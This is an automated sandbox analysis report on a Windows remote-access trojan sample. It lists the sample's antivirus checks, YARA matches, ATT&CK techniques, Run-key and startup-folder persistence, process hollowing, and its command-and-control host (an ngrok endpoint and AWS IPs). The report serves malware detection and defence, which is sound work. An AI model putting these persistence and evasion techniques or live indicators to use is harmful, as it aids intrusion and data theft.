        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct
        Source: C:\Users\user\AppData\Local\Temp\WindowsServices.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: nOZ2Oqnzbz.exe PID: 7116, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: nOZ2Oqnzbz.exe PID: 6500, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2668, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 1896, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 3484, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 6516, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 1868, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 6400, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: 21.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.nOZ2Oqnzbz.exe.620000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.710000.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.WindowsServices.exe.710000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.WindowsServices.exe.710000.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.WindowsServices.exe.2030000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.2.nOZ2Oqnzbz.exe.620000.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 12.1.WindowsServices.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.1.nOZ2Oqnzbz.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.WindowsServices.exe.2030000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.WindowsServices.exe.710000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000001.1622653956.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.1708951126.0000000002030000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1928333872.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1698435023.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000001.1928333872.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000000.00000002.1624278132.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000001.1734806428.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000009.00000002.1738131308.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1991883581.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000001.1734806428.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000012.00000002.1941148934.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.1801120260.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000015.00000002.1991883581.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000001.1705766648.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.1801120260.000000000040E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.1698435023.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000001.1705766648.0000000000402000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000001.1622653956.000000000040E000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: nOZ2Oqnzbz.exe PID: 7116, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: nOZ2Oqnzbz.exe PID: 6500, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 2668, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 1896, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 3484, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 6516, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 1868, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: WindowsServices.exe PID: 6400, type: MEMORYSTR
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity Information211
        Scripting
        Valid Accounts1
        Windows Management Instrumentation
        211
        Scripting
        1
        DLL Side-Loading
        31
        Disable or Modify Tools
        1
        Input Capture
        2
        File and Directory Discovery
        Remote Services1
        Archive Collected Data
        1
        Encrypted Channel
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts21
        Native API
        1
        DLL Side-Loading
        1
        Access Token Manipulation
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory12
        System Information Discovery
        Remote Desktop Protocol1
        Input Capture
        1
        Non-Standard Port
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Shared Modules
        221
        Registry Run Keys / Startup Folder
        311
        Process Injection
        2
        Obfuscated Files or Information
        Security Account Manager311
        Security Software Discovery
        SMB/Windows Admin SharesData from Network Shared Drive1
        Non-Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook221
        Registry Run Keys / Startup Folder
        3
        Software Packing
        NTDS231
        Virtualization/Sandbox Evasion
        Distributed Component Object ModelInput Capture11
        Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets2
        Process Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        File Deletion
        Cached Domain Credentials11
        Application Window Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Masquerading
        DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job231
        Virtualization/Sandbox Evasion
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
        Access Token Manipulation
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron311
        Process Injection
        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1388810 Sample: nOZ2Oqnzbz.exe Startdate: 08/02/2024 Architecture: WINDOWS Score: 100 70 0.tcp.in.ngrok.io 2->70 86 Snort IDS alert for network traffic 2->86 88 Multi AV Scanner detection for domain / URL 2->88 90 Found malware configuration 2->90 92 17 other signatures 2->92 11 nOZ2Oqnzbz.exe 1 2->11         started        15 wscript.exe 1 2->15         started        17 WindowsServices.exe 2->17         started        signatures3 process4 file5 62 C:\Users\user\...\nOZ2Oqnzbz.exex (copy), PE32 11->62 dropped 64 C:\Users\user\Desktop\nOZ2Oqnzbz.exe, PE32 11->64 dropped 102 Detected unpacking (changes PE section rights) 11->102 104 Detected unpacking (overwrites its own PE header) 11->104 106 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 11->106 116 3 other signatures 11->116 19 nOZ2Oqnzbz.exe 1 5 11->19         started        22 cmd.exe 2 11->22         started        108 Windows Scripting host queries suspicious COM object (likely to drop second stage) 15->108 25 WindowsServices.exe 1 15->25         started        110 Tries to detect sandboxes / dynamic malware analysis system (file name check) 17->110 112 Sample uses process hollowing technique 17->112 114 Injects a PE file into a foreign processes 17->114 27 cmd.exe 17->27         started        29 WindowsServices.exe 17->29         started        signatures6 process7 file8 58 C:\Users\user\AppData\...\WindowsServices.exe, PE32 19->58 dropped 31 WindowsServices.exe 1 19->31         started        60 C:\Users\user\AppData\Roaming\...\x.vbs, ASCII 22->60 dropped 94 Command shell drops VBS files 22->94 96 Drops VBS files to the startup folder 22->96 35 conhost.exe 22->35         started        98 Tries to detect sandboxes / dynamic malware analysis system (file name check) 25->98 100 Injects a PE file into a foreign processes 25->100 37 cmd.exe 25->37         started        39 WindowsServices.exe 25->39         started        41 conhost.exe 27->41         started        signatures9 process10 file11 68 C:\Users\user\...\WindowsServices.exex (copy), PE32 31->68 dropped 78 Detected unpacking (changes PE section rights) 31->78 80 Detected unpacking (overwrites its own PE header) 31->80 82 Tries to detect sandboxes / dynamic malware analysis system (file name check) 31->82 84 4 other signatures 31->84 43 WindowsServices.exe 4 5 31->43         started        48 cmd.exe 1 31->48         started        50 conhost.exe 37->50         started        signatures12 process13 dnsIp14 72 3.6.115.182, 19208, 49755, 49756 AMAZON-02US United States 43->72 74 0.tcp.in.ngrok.io 3.6.115.64, 19208, 49735, 49736 AMAZON-02US United States 43->74 76 3.6.98.232, 19208, 49751, 49752 AMAZON-02US United States 43->76 66 C:\...\bf497657d005804b657fde8dd2d0cb46.exe, PE32 43->66 dropped 118 Disables zone checking for all users 43->118 120 Creates autostart registry keys with suspicious names 43->120 52 netsh.exe 43->52         started        54 conhost.exe 48->54         started        file15 signatures16 process17 process18 56 conhost.exe 52->56         started       

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        nOZ2Oqnzbz.exe87%ReversingLabsWin32.Trojan.Skeeeyah
        nOZ2Oqnzbz.exe86%VirustotalBrowse
        nOZ2Oqnzbz.exe100%AviraBDS/Poison.mon
        nOZ2Oqnzbz.exe100%Joe Sandbox ML
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe100%AviraBDS/Poison.mon
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Local\Temp\WindowsServices.exe0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\WindowsServices.exe0%VirustotalBrowse
        C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\WindowsServices.exex (copy)0%VirustotalBrowse
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe87%ReversingLabsWin32.Trojan.Skeeeyah
        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe86%VirustotalBrowse
        C:\Users\user\Desktop\nOZ2Oqnzbz.exe0%ReversingLabs
        C:\Users\user\Desktop\nOZ2Oqnzbz.exe0%VirustotalBrowse
        C:\Users\user\Desktop\nOZ2Oqnzbz.exex (copy)0%ReversingLabs
        C:\Users\user\Desktop\nOZ2Oqnzbz.exex (copy)0%VirustotalBrowse
        No Antivirus matches
        SourceDetectionScannerLabelLink
        0.tcp.in.ngrok.io9%VirustotalBrowse
        SourceDetectionScannerLabelLink
        0.tcp.in.ngrok.io9%VirustotalBrowse
        0.tcp.in.ngrok.io100%Avira URL Cloudmalware
        NameIPActiveMaliciousAntivirus DetectionReputation
        0.tcp.in.ngrok.io
        3.6.115.64
        truetrueunknown
        NameMaliciousAntivirus DetectionReputation
        0.tcp.in.ngrok.iotrue
        • 9%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        3.6.115.182
        unknownUnited States
        16509AMAZON-02UStrue
        3.6.115.64
        0.tcp.in.ngrok.ioUnited States
        16509AMAZON-02UStrue
        3.6.98.232
        unknownUnited States
        16509AMAZON-02UStrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1388810
        Start date and time:2024-02-08 06:51:06 +01:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 9m 14s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:23
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:nOZ2Oqnzbz.exe
        renamed because original name is a hash value
        Original Sample Name:acb30a04da7096c99877b47f3050190d.exe
        Detection:MAL
        Classification:mal100.phis.troj.adwa.spyw.expl.evad.winEXE@30/9@3/3
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 94
        • Number of non-executed functions: 19
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Override analysis time to 240000 for current running targets taking high CPU consumption
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • Report size exceeded maximum capacity and may have missing behavior information.
        • Report size getting too big, too many NtEnumerateKey calls found.
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Report size getting too big, too many NtSetInformationFile calls found.
        TimeTypeDescription
        05:51:52AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x.vbs
        05:52:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
        05:52:21AutostartRun: HKLM\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
        05:52:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bf497657d005804b657fde8dd2d0cb46 "C:\Users\user\AppData\Local\Temp\WindowsServices.exe" ..
        05:52:38AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bf497657d005804b657fde8dd2d0cb46.exe
        06:52:16API Interceptor262924x Sleep call for process: WindowsServices.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        3.6.115.182RN2vknsx6G.exeGet hashmaliciousRedLineBrowse
        • 0.tcp.in.ngrok.io:17440/
        3.6.115.64ZB7Ot9MOic.exeGet hashmaliciousNjratBrowse
          etJZk4UQhS.exeGet hashmaliciousNjratBrowse
